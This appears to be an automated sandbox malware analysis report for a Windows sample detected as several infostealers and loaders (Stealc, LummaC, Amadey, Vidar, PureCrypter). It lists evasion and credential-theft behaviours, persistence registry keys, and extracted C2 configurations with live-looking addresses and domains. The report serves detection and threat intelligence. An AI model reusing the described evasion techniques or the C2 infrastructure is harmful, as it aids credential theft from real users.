Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1553506
MD5:	c8bdae4b54ec9fb34babe5908c1273f1
SHA1:	53111c9f481f86109c4f045c7c65523d9f5906b0
SHA256:	fafd551638daa4ab17ebdc71f2bffd8599332b1f1e95409af51870502cd65e38
Tags:	exeuser-Bitsight
Infos:

Detection

PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Detected PureCrypter Trojan

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Modifies windows update settings

Monitors registry run keys for changes

PE file contains section with special chars

Potentially malicious time measurement code found

Query firmware table information (likely to detect VMs)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 984 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C8BDAE4B54EC9FB34BABE5908C1273F1)

chrome.exe (PID: 6624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2196,i,18163450385097544274,7880029711802891747,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 8100 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7840 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2228,i,14114506295457722425,16393737817898672495,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 8144 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsJDAKJDAAFB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DocumentsJDAKJDAAFB.exe (PID: 8676 cmdline: "C:\Users\user\DocumentsJDAKJDAAFB.exe" MD5: 54DBEA291C01A2BDFB4E2D6AE249EDE3)

skotes.exe (PID: 2140 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 54DBEA291C01A2BDFB4E2D6AE249EDE3)

msedge.exe (PID: 7896 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7640 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2988 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8992 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7188 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 9004 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7336 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8388 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2988 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8152 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7264 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

skotes.exe (PID: 4508 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 54DBEA291C01A2BDFB4E2D6AE249EDE3)

skotes.exe (PID: 7772 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 54DBEA291C01A2BDFB4E2D6AE249EDE3)

167c7bdf2f.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe" MD5: 3B89A078C7DA637D1AAF49DEC99935B0)

d77e539f5f.exe (PID: 8408 cmdline: "C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe" MD5: C8BDAE4B54EC9FB34BABE5908C1273F1)

skotes.exe (PID: 9056 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 54DBEA291C01A2BDFB4E2D6AE249EDE3)

85c9ba9a2d.exe (PID: 8720 cmdline: "C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe" MD5: 1FCA2BFADB61E407F76BDEC22B777423)

167c7bdf2f.exe (PID: 7848 cmdline: "C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe" MD5: 3B89A078C7DA637D1AAF49DEC99935B0)

d77e539f5f.exe (PID: 1888 cmdline: "C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe" MD5: C8BDAE4B54EC9FB34BABE5908C1273F1)

85c9ba9a2d.exe (PID: 7252 cmdline: "C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe" MD5: 1FCA2BFADB61E407F76BDEC22B777423)

167c7bdf2f.exe (PID: 2888 cmdline: "C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe" MD5: 3B89A078C7DA637D1AAF49DEC99935B0)

d77e539f5f.exe (PID: 2124 cmdline: "C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe" MD5: C8BDAE4B54EC9FB34BABE5908C1273F1)

85c9ba9a2d.exe (PID: 8856 cmdline: "C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe" MD5: 1FCA2BFADB61E407F76BDEC22B777423)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
PureCrypter	According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format	No Attribution	https://any.run/cybersecurity-blog/pure-malware-family-analysis/ https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/ https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/ https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter	https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Threatname: LummaC

{"C2 url": ["necklacedmny.store", "founpiuer.store", "fadehairucw.store", "navygenerayk.store", "thumbystriw.store", "presticitpo.store", "scriptyprefej.store", "crisiwarny.store"], "Build id": "4SD0y4--legendaryy"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000018.00000003.2774204257.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000003.2921265886.000000000134B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.2446509016.0000000000B91000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000003.2773461300.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2773690281.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.3008594002.0000000001B9B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001D.00000003.3002870912.0000000001363000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000003.3081849711.00000000085A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000014.00000002.2445335933.0000000000B91000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000019.00000002.2826853766.000000000070E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000003.2800114714.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2412394871.00000000013CE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000021.00000003.3166497243.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.3007450920.0000000000FD1000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001D.00000003.2996193043.0000000001355000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2814219550.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000003.2938921647.000000000134A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.3176586862.0000000000ECC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000002.3134859442.0000000006081000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001C.00000002.2901825216.000000000149B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000003.2799388464.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000002.3289889853.0000000000B91000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000022.00000002.3254080654.0000000000FD1000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2411289868.0000000000751000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000003.2784188124.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000003.2940811405.0000000001355000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.3212224215.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2799292941.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2814302545.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.2416146514.00000000007E1000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001D.00000003.2921839875.000000000134E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001C.00000002.2894025783.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000019.00000003.2786060868.0000000004A50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001D.00000003.3002358113.0000000001357000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000003.2920552958.000000000134A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2811596703.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000002.3253411166.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000003.2783959040.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2811136383.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.3204213691.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000003.2939046647.0000000001355000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000002.3129335841.00000000012F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000022.00000003.3212643969.0000000005210000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001F.00000003.2967174557.00000000058A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2036396995.0000000005100000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001C.00000003.2853526780.0000000005260000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000003.2811767989.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000002.2827858049.0000000000FD1000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 984	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 984	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 984	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 984	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 167c7bdf2f.exe PID: 7824	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 167c7bdf2f.exe PID: 7824	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 167c7bdf2f.exe PID: 7824	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: d77e539f5f.exe PID: 8408	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: d77e539f5f.exe PID: 8408	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: skotes.exe PID: 9056	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: skotes.exe PID: 9056	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 167c7bdf2f.exe PID: 7848	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 167c7bdf2f.exe PID: 7848	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 167c7bdf2f.exe PID: 7848	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 167c7bdf2f.exe PID: 7848	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 167c7bdf2f.exe PID: 7848	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: d77e539f5f.exe PID: 1888	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: d77e539f5f.exe PID: 1888	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 167c7bdf2f.exe PID: 2888	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 167c7bdf2f.exe PID: 2888	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 167c7bdf2f.exe PID: 2888	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: d77e539f5f.exe PID: 2124	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: d77e539f5f.exe PID: 2124	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 66 entries

Unpacked PEs

Source	Rule	Description	Author
29.2.167c7bdf2f.exe.5a57979.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
20.2.skotes.exe.b90000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
19.2.DocumentsJDAKJDAAFB.exe.7e0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.2.skotes.exe.b90000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
23.2.skotes.exe.b90000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7772, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\167c7bdf2f.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 984, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 6624, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7772, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\167c7bdf2f.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:33:21.998113+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.5	49761	TCP
2024-11-11T10:34:00.094724+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.5	50119	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T10:34:11.388665+0100	2028371	3	Unknown Traffic	192.168.2.5	50124	188.114.96.3	443	TCP
2024-11-11T10:34:12.316320+0100	2028371	3	Unknown Traffic	192.168.2.5	50126	188.114.96.3	443	TCP
2024-11-11T10:34:13.843697+0100	2028371	3	Unknown Traffic	192.168.2.5	50127	188.114.96.3	443	TCP
2024-11-11T10:34:15.206443+0100	2028371	3	Unknown Traffic	192.168.2.5	50128	188.114.96.3	443	TCP
2024-11-11T10:34:16.511003+0100	2028371	3	Unknown Traffic	192.168.2.5	50131	188.114.96.3	443	TCP
2024-11-11T10:34:17.830825+0100	2028371	3	Unknown Traffic	192.168.2.5	50134	188.114.96.3	443	TCP
2024-11-11T10:34:19.247560+0100	2028371	3	Unknown Traffic	192.168.2.5	50135	188.114.96.3	443	TCP
2024-11-11T10:34:22.737102+0100	2028371	3	Unknown Traffic	192.168.2.5	50146	188.114.96.3	443	TCP
2024-11-11T10:34:26.542043+0100	2028371	3	Unknown Traffic	192.168.2.5	50150	188.114.96.3	443	TCP
